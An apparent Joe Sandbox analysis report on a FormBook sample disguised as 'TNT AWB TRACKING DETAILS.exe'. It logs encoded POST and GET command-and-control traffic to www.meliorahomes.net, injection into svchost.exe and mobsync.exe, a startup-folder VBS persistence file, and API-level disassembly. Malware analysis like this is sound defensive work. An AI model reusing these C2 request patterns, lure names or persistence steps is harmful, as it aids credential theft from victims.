46 77 30 4a 79 4d 39 4c 44 57 2b 43 68 6e 38 5a 56 62 5a 52 55 64 2f 4d 30 6e 79 Data Ascii: f6Y4tfD=jai/NoPHoBCQh8m21NS+Q5zf5LhfWxfoCIgMy1AUbSJtVoK3edonCmFj0R0S2DoLZqUO4JvYxhU73Jx8Lc//7tGSbm2OLkGIPPpaqIKOB4HbKHGHROjb8wUqAuzcozfh+MCAKcxaF7b+sVCo3RTiylx3Yio6p7divnVtw4lOXOOqFuWfmFw0JyM9LDW+Chn8ZVbZRUd/M0ny
Dec 16, 2024 08:39:16.162918091 CET	393	IN	HTTP/1.1 404 Not Found Date: Mon, 16 Dec 2024 07:39:15 GMT Server: Apache/2.4.6 (CentOS) PHP/7.2.34 Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49999	8.217.17.192	80	6280	C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 08:39:17.418270111 CET	812	OUT	POST /ir1u/ HTTP/1.1 Host: www.meliorahomes.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.meliorahomes.net Referer: http://www.meliorahomes.net/ir1u/ Cache-Control: no-cache Content-Length: 236 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505) Data Raw: 66 36 59 34 74 66 44 3d 6a 61 69 2f 4e 6f 50 48 6f 42 43 51 37 66 2b 32 7a 75 36 2b 48 4a 7a 41 31 72 68 66 44 68 66 53 43 49 6b 4d 79 30 30 45 62 67 74 74 56 49 36 33 66 5a 38 6e 50 47 46 6a 2f 78 30 62 34 6a 6f 4d 5a 71 59 47 34 4a 6a 59 78 67 77 37 33 49 42 38 4b 72 6a 38 35 39 47 51 41 57 32 49 49 55 47 49 50 50 70 61 71 4d 62 72 42 38 72 62 4b 58 32 48 52 76 6a 59 31 51 56 59 49 4f 7a 63 73 7a 66 74 2b 4d 43 2b 4b 65 55 42 46 2f 72 2b 73 58 61 6f 77 44 33 68 34 6c 77 38 63 69 70 46 35 4a 45 2b 67 33 49 73 75 72 74 36 58 38 65 42 4a 34 4c 46 36 32 77 58 62 69 73 2f 4c 42 4f 4d 43 42 6e 57 62 56 6a 5a 44 44 52 59 44 41 43 52 64 51 69 57 31 55 79 6c 70 72 78 77 43 6a 59 67 54 63 50 76 4c 41 3d 3d Data Ascii: f6Y4tfD=jai/NoPHoBCQ7f+2zu6+HJzA1rhfDhfSCIkMy00EbgttVI63fZ8nPGFj/x0b4joMZqYG4JjYxgw73IB8Krj859GQAW2IIUGIPPpaqMbrB8rbKX2HRvjY1QVYIOzcszft+MC+KeUBF/r+sXaowD3h4lw8cipF5JE+g3Isurt6X8eBJ4LF62wXbis/LBOMCBnWbVjZDDRYDACRdQiW1UylprxwCjYgTcPvLA==
Dec 16, 2024 08:39:18.960903883 CET	393	IN	HTTP/1.1 404 Not Found Date: Mon, 16 Dec 2024 07:39:18 GMT Server: Apache/2.4.6 (CentOS) PHP/7.2.34 Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	50007	8.217.17.192	80	6280	C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 08:39:20.081794024 CET	1825	OUT	POST /ir1u/ HTTP/1.1 Host: www.meliorahomes.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.meliorahomes.net Referer: http://www.meliorahomes.net/ir1u/ Cache-Control: no-cache Content-Length: 1248 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505) Data Raw: 66 36 59 34 74 66 44 3d 6a 61 69 2f 4e 6f 50 48 6f 42 43 51 37 66 2b 32 7a 75 36 2b 48 4a 7a 41 31 72 68 66 44 68 66 53 43 49 6b 4d 79 30 30 45 62 67 6c 74 56 37 79 33 66 2b 51 6e 4f 47 46 6a 6a 42 30 65 34 6a 6f 52 5a 70 6f 43 34 49 66 49 78 69 34 37 6d 62 4a 38 61 4f 58 38 77 39 47 51 49 32 32 4a 4c 6b 47 64 50 4f 46 65 71 49 2f 72 42 38 72 62 4b 55 2b 48 58 2b 6a 59 7a 51 55 71 41 75 7a 51 6f 7a 65 79 2b 4d 61 78 4b 65 41 52 47 4f 58 2b 73 33 4b 6f 31 78 76 68 2b 31 77 2b 62 69 70 64 35 4a 34 58 67 33 55 4b 75 6f 77 74 58 38 36 42 4c 64 61 2b 76 48 67 44 43 53 70 66 63 54 4b 49 4f 55 71 6f 45 6b 2f 31 4b 51 34 74 4e 41 47 37 59 57 53 32 2b 6e 44 46 70 64 5a 64 42 57 30 7a 66 50 43 46 66 44 77 36 45 70 57 47 6b 7a 39 44 61 7a 67 6e 46 75 74 50 7a 4b 69 66 46 74 63 33 6e 61 6a 2f 33 6a 62 75 2f 5a 33 47 36 6e 55 71 4c 56 31 69 39 59 4a 7a 45 70 37 39 6c 4b 35 6a 63 41 6f 70 2b 47 37 30 39 45 6b 31 4f 35 44 6b 4e 65 70 70 32 4d 74 31 66 6f 54 7a 41 50 54 68 59 66 70 62 4f 31 74 43 38 48 78 38 7a 70 [TRUNCATED] Data Ascii: f6Y4tfD=jai/NoPHoBCQ7f+2zu6+HJzA1rhfDhfSCIkMy00EbgltV7y3f+QnOGFjjB0e4joRZpoC4IfIxi47mbJ8aOX8w9GQI22JLkGdPOFeqI/rB8rbKU+HX+jYzQUqAuzQozey+MaxKeARGOX+s3Ko1xvh+1w+bipd5J4Xg3UKuowtX86BLda+vHgDCSpfcTKIOUqoEk/1KQ4tNAG7YWS2+nDFpdZdBW0zfPCFfDw6EpWGkz9DazgnFutPzKifFtc3naj/3jbu/Z3G6nUqLV1i9YJzEp79lK5jcAop+G709Ek1O5DkNepp2Mt1foTzAPThYfpbO1tC8Hx8zp4+PHui0WQ/TbgnnC6N0iJqAfCulxSiaL4GUXiLOqLkXT4cFwE1gMLmWizuHcK2JfPlsWS6sNnl3vadyNA7xc05dNrzKNgojCdrBADoM4m/2NQZ6zMUnaWGyfCShVMCqSNaeRgW4+d157bw/bqcLNjJtgPIQFQ/Et87VbQFUkyvaMB7bMu2KloZagi2yA7t25tPLmCkqCVFcw4mfPH4wbeCB0jWaFeWispV2p9CDf7reZJ7tHyqFVcBjzi1VRm65kbsVxpiyLoDbaX6jWYbo7dDquM7yXh1Bt7lYrO8IB6q3MQzb//St8LU6qmnhf8cLYdyij9jx4g6SkyEUbXMj3qvpkUmz6aFNhKjnlkB/QO8bKgGaGsgNvrZRcPRxvZF0GQSJsOGXAXL1BvwzIab/jRXVHFg7xjjubFNj7u+ofq80Og06wx87iu7jYzv1BtDTcJfmdRcke8JMBsstdofGzCz0N5jVAsZjtDxPDRocJ/0wQSYvY2iKWQNGyPif/ckHAXIAfOYvX1ECPeiCOjZg8ZjP0blU/iAquluqD9LKZ6Dy3P+KPAxgOvhu6ORVwe+psm1KYahc1FbgzTHb6zWGrc2Bj9XigNUtBVyEsYF1UDjuQ49an+2jcQ/TxGiyAa9HDq7fk5qfUriCkSE/Q8bh9eqazCVDx0sufDA [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	50015	8.217.17.192	80	6280	C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 08:39:22.847723961 CET	521	OUT	GET /ir1u/?f6Y4tfD=uYKfOYzDqyqggai79vqScpm8ne5FVijKNd4332x8Wl1jbLzIat8ECGM70iN++AMSU9cBnLmC3wIu2ItfOOX86+yEJ2aXOXj0apRFi4P0I8PrRUWlOvP3kyATHOLhpgDgxP6JOJQ=&tB=FpalKbExj HTTP/1.1 Host: www.meliorahomes.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
Dec 16, 2024 08:39:24.373280048 CET	393	IN	HTTP/1.1 404 Not Found Date: Mon, 16 Dec 2024 07:39:24 GMT Server: Apache/2.4.6 (CentOS) PHP/7.2.34 Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>

Target ID:	0
Start time:	02:37:16
Start date:	16/12/2024
Path:	C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
Imagebase:	0xaa0000
File size:	1'169'920 bytes
MD5 hash:	BC31759CEAC4E0F680E1D6462953979B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:37:18
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
Imagebase:	0x220000
File size:	1'169'920 bytes
MD5 hash:	BC31759CEAC4E0F680E1D6462953979B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:37:19
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
Imagebase:	0x170000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2801297101.0000000004750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2800761539.0000000003890000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2800235122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:37:29
Start date:	16/12/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs"
Imagebase:	0x7ff78f510000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:37:30
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"
Imagebase:	0x220000
File size:	1'169'920 bytes
MD5 hash:	BC31759CEAC4E0F680E1D6462953979B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:37:33
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"
Imagebase:	0x170000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2839997588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:38:10
Start date:	16/12/2024
Path:	C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe"
Imagebase:	0x720000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3439275115.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	02:38:13
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\mobsync.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\mobsync.exe"
Imagebase:	0x5d0000
File size:	93'696 bytes
MD5 hash:	F7114D05B442F103BD2D3E20E78A7AA5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.3439303985.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.3436884138.0000000000310000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.3439378043.00000000041F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	02:38:38
Start date:	16/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	7.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	42

Executed Functions

Function 00AA3B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AA3B68
IsDebuggerPresent.KERNEL32 ref: 00AA3B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,00B652F8,00B652E0,?,?), ref: 00AA3BEB

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

Part of subcall function 00AB092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00AA3C14,00B652F8,?,?,?), ref: 00AB096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00AA3C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00B57770,00000010), ref: 00ADD281
SetCurrentDirectoryW.KERNEL32(?,00B652F8,?,?,?), ref: 00ADD2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B54260,00B652F8,?,?,?), ref: 00ADD33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 00ADD346

Part of subcall function 00AA3A46: GetSysColorBrush.USER32(0000000F), ref: 00AA3A50
Part of subcall function 00AA3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00AA3A5F
Part of subcall function 00AA3A46: LoadIconW.USER32(00000063), ref: 00AA3A76
Part of subcall function 00AA3A46: LoadIconW.USER32(000000A4), ref: 00AA3A88
Part of subcall function 00AA3A46: LoadIconW.USER32(000000A2), ref: 00AA3A9A
Part of subcall function 00AA3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AA3AC0
Part of subcall function 00AA3A46: RegisterClassExW.USER32(?), ref: 00AA3B16

Part of subcall function 00AA39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AA3A03
Part of subcall function 00AA39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AA3A24
Part of subcall function 00AA39D5: ShowWindow.USER32(00000000,?,?), ref: 00AA3A38
Part of subcall function 00AA39D5: ShowWindow.USER32(00000000,?,?), ref: 00AA3A41

Part of subcall function 00AA434A: _memset.LIBCMT ref: 00AA4370
Part of subcall function 00AA434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AA4415

Strings

runas, xrefs: 00ADD33A
This is a third-party compiled AutoIt script., xrefs: 00ADD279

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: f1fa3fd8fba9698a775684abc57ecedf92354338ec193ed4bbdf45415f25184f
Instruction ID: b5603310cb67093f0786da74c7b42918de841604ab4671a3b7ab7c0a0d3430f0
Opcode Fuzzy Hash: f1fa3fd8fba9698a775684abc57ecedf92354338ec193ed4bbdf45415f25184f
Instruction Fuzzy Hash: 0951F671D04108AACF21EFB4DD15EFE7BB8AB4A710F0040A5F411A71E2CFB44A59CB21

Function 00AA49A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00AA49CD

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

GetCurrentProcess.KERNEL32(?,00B2FAEC,00000000,00000000,?), ref: 00AA4A9A
IsWow64Process.KERNEL32(00000000), ref: 00AA4AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00AA4AE7
FreeLibrary.KERNEL32(00000000), ref: 00AA4AF2
GetSystemInfo.KERNEL32(00000000), ref: 00AA4B23
GetSystemInfo.KERNEL32(00000000), ref: 00AA4B2F

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: c07e6f675a0bc9f96dc43ab39e24664a3389479fd3563b964e49e69aa8daf9e9
Instruction ID: ed2bf371578f38a4e981c3c97d43f68ee47a2b9b6d43ece3a1a44788e21fe4e9
Opcode Fuzzy Hash: c07e6f675a0bc9f96dc43ab39e24664a3389479fd3563b964e49e69aa8daf9e9
Instruction Fuzzy Hash: ED91C5319897C1DEC731CB6885505AAFFF5AF6E300F4449AEE0C793B82D360A508D769

Function 00AA4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00AA4D8E,?,?,00000000,00000000), ref: 00AA4E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00AA4D8E,?,?,00000000,00000000), ref: 00AA4EB0
LoadResource.KERNEL32(?,00000000,?,?,00AA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00AA4E2F), ref: 00ADD937
SizeofResource.KERNEL32(?,00000000,?,?,00AA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00AA4E2F), ref: 00ADD94C
LockResource.KERNEL32(00AA4D8E,?,?,00AA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00AA4E2F,00000000), ref: 00ADD95F

Strings

SCRIPT, xrefs: 00AA4EA6

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 4186d10f715ad1f71b749f8b899fb035896c4b95b7c779044a34fc5916010cda
Instruction ID: 9f27b02c73509c9ae5936b51d14f135a56365f6be5ae36f67b1374e10c4b2fd1
Opcode Fuzzy Hash: 4186d10f715ad1f71b749f8b899fb035896c4b95b7c779044a34fc5916010cda
Instruction Fuzzy Hash: 2F115E75240701BFD7318B65EC48F677BBAFBCAB11F104278F406972A0DBA1EC018661

Function 00AAFCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: d479775f5c94b2e5204a9caa663cb60005e9323d345c744443442ce1d0f6b9e0
Instruction ID: 8ea0cbb35788f2c2b84c65f292f167894a7ece8442cdadc75e0352a0766c3c3c
Opcode Fuzzy Hash: d479775f5c94b2e5204a9caa663cb60005e9323d345c744443442ce1d0f6b9e0
Instruction Fuzzy Hash: 589269706083418FD724DF15C580B6BBBE9BF89304F14896DE88A9B3A2D775EC45CB92

Function 00B0445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00ADE398), ref: 00B0446A
FindFirstFileW.KERNELBASE(?,?), ref: 00B0447B
FindClose.KERNEL32(00000000), ref: 00B0448B

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

